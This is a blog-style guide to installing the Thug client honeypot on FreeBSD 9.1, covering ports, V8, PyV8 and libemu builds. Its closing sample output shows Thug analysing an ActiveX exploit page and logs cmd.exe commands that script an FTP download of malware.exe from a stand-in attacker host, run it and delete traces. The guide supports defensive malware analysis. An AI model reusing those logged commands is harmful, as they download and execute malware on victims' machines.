Comment(s)

Thug is a low-interaction client honeypot used for analyzing web-based, client-side attacks. As client-side attacks become more obfuscated and difficult to analyze, Thug can be used to emulate the behavior of a web browser (16 different User-Agents at time of writing) to detect malicious web pages while creating detailed logs and saving payloads.

While looking into Thug I found that there wasn't an existing guide for installing it on FreeBSD. The Thug build documentation is good, but I found it makes a number of assumptions on prerequisites already being installed. After some trial and error I've documented the entire process I used to get Thug running on a fresh FreeBSD 9.1 image.

The following guide was done on a minimal install of FreeBSD 9.1(i386) with only the 'SSH Server' chosen during installation. Also, all commands are run as the 'root' user.

First we'll install any security updates for the OS and install the latest ports tree:

freebsd-update fetch install
portsnap fetch extract

The Portmaster utility will be used to build and install most of the required packages so we'll install that next:

cd /usr/ports/ports-mgmt/portmaster/ && make -DBATCH install clean

At the time of writing there was an issue with the distro sites for 'pkgconf' so manually download the port tarball:

cd /usr/ports/distfiles; fetch http://rabbit.dereferenced.org/~nenolod/distfiles/pkgconf-0.8.12.tar.bz2

I also don't want a full X11 installation, just the minimal dependancies, so I add a global 'make' option to /etc/make.conf:

echo "WITHOUT_X11=yes" >> /etc/make.conf

Now install the required tools, libraries and Python modules:

portmaster -dG --no-confirm \
devel/subversion        \
devel/git               \
devel/boost-libs        \
devel/boost-python-libs \
devel/autoconf          \
devel/libtool           \
devel/libexecinfo       \
devel/py-zope.interface \
www/py-beautifulsoup    \
www/py-cssutils         \
www/py-httplib2         \
devel/py-pefile         \
www/py-html5lib         \
textproc/py-chardet     \
devel/py-parsing        \
graphics/py-pydot       \
devel/py-magic

The remaining packages will be built manually so we'll create a directory to work from:

mkdir /usr/local/src; cd /usr/local/src
Thug

Grab the Thug source from GitHub:

git clone https://github.com/buffer/thug.git /opt/thug
Google V8

Pull the latest V8 code from Google Code and apply the required Thug patch:

svn checkout http://v8.googlecode.com/svn/trunk/ v8
patch -p0 < /opt/thug/patches/V8-patch1.diff
setenv V8_HOME /usr/local/src/v8
PyV8

Pull revision 478 of PyV8 from Google Code, build and install:

svn checkout -r478 http://pyv8.googlecode.com/svn/trunk/ pyv8
cd pyv8
python setup.py build
python setup.py install
Libemu

Libemu is for X86 emulation and shellcode detection:

cd /usr/local/src
git clone git://git.carnivore.it/libemu.git
cd libemu
autoreconf -v -i
./configure --prefix=/opt/libemu
make install

Now add the Libemu libraries to the shared library cache:

ldconfig -m /opt/libemu/lib
Pylibemu

Pylibemu is a Python wrapper for the Libemu library:

cd /usr/local/src
git clone git://github.com/buffer/pylibemu.git
cd pylibemu
python setup.py build
python setup.py install

You should now have a fully functional Thug installation! You can test it out with some of the samples that come with the Thug source:

python /opt/thug/src/thug.py -l /opt/thug/samples/exploits/hpinfo1.html

Output:

[2013-03-11 19:48:47] <object classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A" height="0" id="o2obj" width="0">
</object>
[2013-03-11 19:48:47] ActiveXObject: 62DDEB79-15B2-41E3-8834-D3B80493887A
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C echo open attacker.ftp.server >> c:\ftpd&echo IDidntDoAnything>> c:\ftpd&echo password>> c:    \ftpd&echo binary>> c:\ftpd&echo get malware.exec:\malware.exe >> c:\ftpd&echo quit>> c:\ftpd
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C echo cd c:\>> c:\ftpd.bat&echo ftp -s:ftpd>> c:\ftpd.bat&echo start c:\malware.exe >> c:\ftpd.bat
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C c:\ftpd.bat&del c:\ftpd.bat&del c:\ftpd&del c:\malware.exe
[2013-03-11 19:48:47] Saving log analysis at ../logs/64037689e0e2abeb11475e13e80e904f/20130311194846


Comments

comments powered by Disqus